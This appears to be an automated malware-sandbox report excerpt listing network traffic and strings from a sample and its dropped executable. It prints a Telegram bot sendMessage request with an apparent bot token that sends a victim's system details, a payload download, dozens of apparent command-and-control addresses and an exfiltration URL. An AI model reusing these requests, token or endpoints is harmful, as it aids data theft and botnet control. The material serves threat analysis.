                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /byte/@jokerbot880901.txt HTTP/1.1Host: 82.147.85.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: ip-api.com
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.248.208.221:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.161.20.142:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.202.101.219:8080
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, hahahahaha.txt.18.drString found in binary or memory: http://127.0.0.1:6787/
                  Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9D5000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6787/ing=no
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.151.109.160:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.126.132.141:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.88.44.159:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.26.128.6:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.80.130:80
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59
                  Source: vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/get
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/hkLYW_user
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/hkLYW_user%40468325_report.wsr
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:80802
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.142.58.127:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.142.58.127:80Pk
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.109.146:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.6.44.53:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.250.190.139:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.224.102.6:8001
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.248.176.37:180
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.136.13:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.136.52:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.42.56.128:80
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.85
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002DAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.85.194
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.85.194/byte/
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: vkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                  Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.net
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line?fields=query
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000001.00000002.1717594364.000000000785F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/i?
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01A44000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D17F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997F9F000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A001B2000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B62000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B33000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D18E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: Amcache.hve.41.drString found in binary or memory: http://upx.sf.net
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000001.00000002.1717242084.0000000007819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co(=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD78E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://13.231.21.109:443
                  Source: vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://164.90.185.9:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://18.178.28.151:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://185.217.98.121:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://192.99.196.191:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://44.228.161.50:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://64.227.21.98:443
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
